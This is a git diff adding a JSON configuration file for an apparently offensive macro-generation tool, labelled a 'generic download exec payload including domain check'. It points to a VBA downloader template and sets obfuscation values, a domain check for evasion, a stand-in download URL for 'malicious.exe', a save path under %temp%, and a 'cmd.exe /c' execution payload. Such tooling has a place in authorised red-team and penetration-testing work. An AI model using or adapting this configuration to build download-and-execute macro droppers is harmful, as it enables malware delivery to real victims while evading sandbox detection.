diff --git a/configs/generic-downloader-domain-evasion.json b/configs/generic-downloader-domain-evasion.json new file mode 100644 index 0000000..45f5acb --- /dev/null +++ b/configs/generic-downloader-domain-evasion.json @@ -0,0 +1,13 @@ +{ + "description": "Generic download exec payload including domain check", + "comment": "File is saved at the following path %temp%\\PATH.", + "template": "../template/downloader.vba", + "varcount": 80, + "encodingoffset": 4, + "encodedvars": { + "DOMAIN": "RINGZER0", + "URL": "http://127.0.0.1/malicious.exe", + "PATH": "malicious.exe" + }, + "payload": "cmd.exe /c " +} \ No newline at end of file